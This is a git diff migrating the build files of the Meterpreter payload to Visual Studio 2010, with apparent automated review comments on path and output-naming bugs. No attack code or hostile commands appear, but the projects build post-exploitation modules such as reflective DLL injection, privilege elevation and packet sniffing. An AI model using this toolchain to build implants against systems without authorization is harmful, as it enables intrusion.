+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ %(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ %(PreprocessorDefinitions)
+ \framework3\trunk\external\source\meterpreter\source\extensions\stdapi\server\resource;%(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ \framework3\trunk\external\source\meterpreter\source\extensions\stdapi\server\resource;%(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ \framework3\trunk\external\source\meterpreter\source\extensions\stdapi\server\resource;%(AdditionalIncludeDirectories)
+ %(PreprocessorDefinitions)
+ \framework3\trunk\external\source\meterpreter\source\extensions\stdapi\server\resource;%(AdditionalIncludeDirectories)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+ {37e24f8f-1bd9-490b-8cd2-4768b89e5eab}
+ false
+
+
+ {72f0246a-a38d-4547-9057-46020e8e503d}
+ false
+
+
+
+
+
+
+
\ No newline at end of file
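Review bot: The four include-directory values near the end of the file (they look like the per-configuration resource-compile settings) are drive-rooted, `\framework3\trunk\external\source\meterpreter\source\extensions\stdapi\server\resource;%(AdditionalIncludeDirectories)`, so they resolve against the root of whatever drive the build runs on, not against the checkout. On another machine that path is either missing or points at a directory outside the source tree, and anything found there would be pulled into the build. A project-relative value, `..\..\source\extensions\stdapi\server\resource;%(AdditionalIncludeDirectories)`, matches how the compiler include directories in this file are written. The x64 Release post-build step also copies `release\*.dll` where the Win32 one names `ext_server_stdapi.dll`.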
diff --git a/external/source/meterpreter/workspace/metcli/metcli.vcxproj b/external/source/meterpreter/workspace/metcli/metcli.vcxproj
new file mode 100644
index 0000000000..a16e30b67a
--- /dev/null
+++ b/external/source/meterpreter/workspace/metcli/metcli.vcxproj
@@ -0,0 +1,349 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {4DECF649-2B11-47A2-908E-031105D706F8}
+ metcli
+
+
+
+ Application
+ false
+ MultiByte
+
+
+ Application
+ false
+ MultiByte
+
+
+ Application
+ false
+ MultiByte
+
+
+ Application
+ false
+ MultiByte
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ .\Debug\
+ .\Debug\
+ true
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ .\Debug/metcli.tlb
+
+
+
+
+ Disabled
+ _DEBUG;WIN32;_CONSOLE;USE_DLL;METERPRETER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreaded
+ Use
+ metcli.h
+ .\Debug/metcli.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ EditAndContinue
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ common.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/metcli.exe
+ true
+ ..\common\Debug;%(AdditionalLibraryDirectories)
+ ..\..\source\client\metcli.def
+ true
+ .\Debug/metcli.pdb
+ Console
+ false
+
+
+ MachineX86
+
+
+ true
+ .\Debug/metcli.bsc
+
+
+ copy debug\metcli.exe ..\..\output\client
+
+
+
+
+ X64
+ .\Debug/metcli.tlb
+
+
+
+
+ Disabled
+ _DEBUG;WIN32;_CONSOLE;USE_DLL;METERPRETER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreaded
+ Use
+ metcli.h
+ .\Debug/metcli.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ ProgramDatabase
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ common.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/metcli.exe
+ true
+ ..\common\Debug;%(AdditionalLibraryDirectories)
+ ..\..\source\client\metcli.def
+ true
+ .\Debug/metcli.pdb
+ Console
+ false
+
+
+ MachineX64
+
+
+ true
+ .\Debug/metcli.bsc
+
+
+ copy debug\metcli.exe ..\..\output\client
+
+
+
+
+ .\Release/metcli.tlb
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ NDEBUG;WIN32;_CONSOLE;USE_DLL;METERPRETER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ true
+ Use
+ metcli.h
+ .\Release/metcli.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ backcompat.lib;common.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Release/metcli.exe
+ true
+ ..\backcompat\Release;..\common\Release; ..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ ..\..\source\client\metcli.def
+ true
+ .\Release/metcli.pdb
+ Console
+ false
+
+
+ MachineX86
+
+
+ true
+ .\Release/metcli.bsc
+
+
+ copy /y "$(ProjectDir)\release\metcli.exe" "$(ProjectDir)..\..\output\"
+
+
+
+
+ X64
+ .\Release/metcli.tlb
+
+
+
+
+ MaxSpeed
+ OnlyExplicitInline
+ ..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ NDEBUG;WIN32;_CONSOLE;USE_DLL;METERPRETER_EXPORTS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Use
+ metcli.h
+ .\Release/metcli.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ common.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Release/metcli.exe
+ true
+ ..\common\Release; ..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ ..\..\source\client\metcli.def
+ true
+ .\Release/metcli.pdb
+ Console
+ false
+
+
+ MachineX64
+
+
+ true
+ .\Release/metcli.bsc
+
+
+ copy /y "$(ProjectDir)\release\metcli.exe" "$(ProjectDir)..\..\output\"
+
+
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+
+
+
+
\ No newline at end of file
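Review bot: Release|Win32 and Release|x64 both link to `.\Release/metcli.exe`, and both post-build steps run `copy /y "$(ProjectDir)\release\metcli.exe" "$(ProjectDir)..\..\output\"`, so whichever platform builds last silently replaces the other's binary in the output directory. metsrv.vcxproj and screenshot.vcxproj in this same commit avoid that by naming the 64-bit artifact `metsrv.x64.dll` and `screenshot.x64.dll`. The x64 output here should follow the same scheme, e.g. `.\Release\metcli.x64.exe`, with the copy line adjusted to match. The element names did not survive in this rendering, so the bare `true`/`false` values could not be matched to their settings and were not reviewed.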
diff --git a/external/source/meterpreter/workspace/meterpreter.sln b/external/source/meterpreter/workspace/meterpreter.sln
index 154e783e7c..e272264246 100644
--- a/external/source/meterpreter/workspace/meterpreter.sln
+++ b/external/source/meterpreter/workspace/meterpreter.sln
@@ -1,72 +1,29 @@
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual Studio 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "common", "common\common.vcproj", "{9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}"
+Microsoft Visual Studio Solution File, Format Version 11.00
+# Visual Studio 2010
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "common", "common\common.vcxproj", "{9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_priv", "ext_server_priv\ext_server_priv.vcproj", "{87C64204-C82F-415D-AF45-D0B33BDFE39A}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- {662AFBB3-F64A-4AD1-8956-B9F1B846231C} = {662AFBB3-F64A-4AD1-8956-B9F1B846231C}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_priv", "ext_server_priv\ext_server_priv.vcxproj", "{87C64204-C82F-415D-AF45-D0B33BDFE39A}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_stdapi", "ext_server_stdapi\ext_server_stdapi.vcproj", "{405245AB-0071-4CB9-BFBE-ED4E2A987EFF}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_stdapi", "ext_server_stdapi\ext_server_stdapi.vcxproj", "{405245AB-0071-4CB9-BFBE-ED4E2A987EFF}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "metcli", "metcli\metcli.vcproj", "{4DECF649-2B11-47A2-908E-031105D706F8}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "metcli", "metcli\metcli.vcxproj", "{4DECF649-2B11-47A2-908E-031105D706F8}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "metsrv", "metsrv\metsrv.vcproj", "{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "metsrv", "metsrv\metsrv.vcxproj", "{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ReflectiveDLLInjection", "ReflectiveDLLInjection\ReflectiveDLLInjection.vcproj", "{72F0246A-A38D-4547-9057-46020E8E503D}"
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ReflectiveDLLInjection", "ReflectiveDLLInjection\ReflectiveDLLInjection.vcxproj", "{72F0246A-A38D-4547-9057-46020E8E503D}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_incognito", "ext_server_incognito\ext_server_incognito.vcproj", "{C427F6B9-C287-4BDA-A5BB-401FC19E207C}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_incognito", "ext_server_incognito\ext_server_incognito.vcxproj", "{C427F6B9-C287-4BDA-A5BB-401FC19E207C}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_boiler", "ext_server_boiler\ext_server_boiler.vcproj", "{488BE203-8407-42D1-B334-8B5C3BC5AB3E}"
- ProjectSection(ProjectDependencies) = postProject
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_boiler", "ext_server_boiler\ext_server_boiler.vcxproj", "{488BE203-8407-42D1-B334-8B5C3BC5AB3E}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_espia", "ext_server_espia\ext_server_espia.vcproj", "{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_espia", "ext_server_espia\ext_server_espia.vcxproj", "{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_sniffer", "ext_server_sniffer\ext_server_sniffer.vcproj", "{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_sniffer", "ext_server_sniffer\ext_server_sniffer.vcxproj", "{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "elevator", "elevator\elevator.vcproj", "{662AFBB3-F64A-4AD1-8956-B9F1B846231C}"
- ProjectSection(ProjectDependencies) = postProject
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "elevator", "elevator\elevator.vcxproj", "{662AFBB3-F64A-4AD1-8956-B9F1B846231C}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "screenshot", "screenshot\screenshot.vcproj", "{09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}"
- ProjectSection(ProjectDependencies) = postProject
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "screenshot", "screenshot\screenshot.vcxproj", "{09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_pivot", "ext_server_pivot\ext_server_pivot.vcproj", "{C4801040-A3B8-11DF-811F-2A3AE0D72085}"
ProjectSection(ProjectDependencies) = postProject
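Review bot: The context line for `ext_server_pivot` at the end of this hunk still points at `ext_server_pivot\ext_server_pivot.vcproj` and keeps its `ProjectSection(ProjectDependencies)` block, while every other project entry moved to `.vcxproj` and the header now declares Format Version 11.00. Visual Studio 2010 will presumably try to convert that project on load, and a command-line build of the solution may not handle the old format. If a converted project exists, the path in that entry should read `"ext_server_pivot\ext_server_pivot.vcxproj"`. With the other `ProjectDependencies` sections removed, build order now rests on the project references inside each `.vcxproj`, which is worth confirming for the projects not shown in this part of the diff.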
@@ -75,129 +32,73 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_pivot", "ext_ser
{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
EndProjectSection
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_lanattacks", "ext_server_lanattacks\ext_server_lanattacks.vcproj", "{2FCCCE33-77E9-43F3-928E-DBF6B9340A62}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_lanattacks", "ext_server_lanattacks\ext_server_lanattacks.vcxproj", "{2FCCCE33-77E9-43F3-928E-DBF6B9340A62}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "backcompat", "backcompat\backcompat.vcxproj", "{C6FB3275-9067-4BBA-9206-0A720D2BC64F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|Win32 = Debug|Win32
- Debug|x64 = Debug|x64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Debug|Win32.ActiveCfg = Debug|Win32
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Debug|Win32.Build.0 = Debug|Win32
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Debug|x64.ActiveCfg = Debug|x64
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Debug|x64.Build.0 = Debug|x64
{9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Release|Win32.ActiveCfg = Release|Win32
{9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Release|Win32.Build.0 = Release|Win32
{9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Release|x64.ActiveCfg = Release|x64
{9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Release|x64.Build.0 = Release|x64
- {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|Win32.ActiveCfg = Debug|Win32
- {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|Win32.Build.0 = Debug|Win32
- {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|x64.ActiveCfg = Debug|x64
- {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|x64.Build.0 = Debug|x64
{87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|Win32.ActiveCfg = Release|Win32
{87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|Win32.Build.0 = Release|Win32
{87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|x64.ActiveCfg = Release|x64
{87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|x64.Build.0 = Release|x64
- {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|Win32.ActiveCfg = Debug|Win32
- {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|Win32.Build.0 = Debug|Win32
- {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|x64.ActiveCfg = Debug|x64
- {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|x64.Build.0 = Debug|x64
{405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|Win32.ActiveCfg = Release|Win32
{405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|Win32.Build.0 = Release|Win32
{405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|x64.ActiveCfg = Release|x64
{405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|x64.Build.0 = Release|x64
- {4DECF649-2B11-47A2-908E-031105D706F8}.Debug|Win32.ActiveCfg = Debug|Win32
- {4DECF649-2B11-47A2-908E-031105D706F8}.Debug|Win32.Build.0 = Debug|Win32
- {4DECF649-2B11-47A2-908E-031105D706F8}.Debug|x64.ActiveCfg = Debug|x64
{4DECF649-2B11-47A2-908E-031105D706F8}.Release|Win32.ActiveCfg = Release|Win32
{4DECF649-2B11-47A2-908E-031105D706F8}.Release|x64.ActiveCfg = Release|x64
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|Win32.ActiveCfg = Debug|Win32
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|Win32.Build.0 = Debug|Win32
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|x64.ActiveCfg = Debug|x64
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|x64.Build.0 = Debug|x64
{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|Win32.ActiveCfg = Release|Win32
{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|Win32.Build.0 = Release|Win32
{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|x64.ActiveCfg = Release|x64
{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|x64.Build.0 = Release|x64
- {72F0246A-A38D-4547-9057-46020E8E503D}.Debug|Win32.ActiveCfg = Release|Win32
- {72F0246A-A38D-4547-9057-46020E8E503D}.Debug|Win32.Build.0 = Release|Win32
- {72F0246A-A38D-4547-9057-46020E8E503D}.Debug|x64.ActiveCfg = Debug|x64
- {72F0246A-A38D-4547-9057-46020E8E503D}.Debug|x64.Build.0 = Debug|x64
{72F0246A-A38D-4547-9057-46020E8E503D}.Release|Win32.ActiveCfg = Release|Win32
{72F0246A-A38D-4547-9057-46020E8E503D}.Release|Win32.Build.0 = Release|Win32
{72F0246A-A38D-4547-9057-46020E8E503D}.Release|x64.ActiveCfg = Release|x64
{72F0246A-A38D-4547-9057-46020E8E503D}.Release|x64.Build.0 = Release|x64
- {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|Win32.ActiveCfg = Debug|Win32
- {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|Win32.Build.0 = Debug|Win32
- {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|x64.ActiveCfg = Debug|x64
- {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|x64.Build.0 = Debug|x64
{C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|Win32.ActiveCfg = Release|Win32
{C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|Win32.Build.0 = Release|Win32
{C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|x64.ActiveCfg = Release|x64
{C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|x64.Build.0 = Release|x64
- {488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Debug|Win32.ActiveCfg = Debug|Win32
- {488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Debug|Win32.Build.0 = Debug|Win32
- {488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Debug|x64.ActiveCfg = Debug|x64
- {488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Debug|x64.Build.0 = Debug|x64
{488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Release|Win32.ActiveCfg = Release|Win32
{488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Release|Win32.Build.0 = Release|Win32
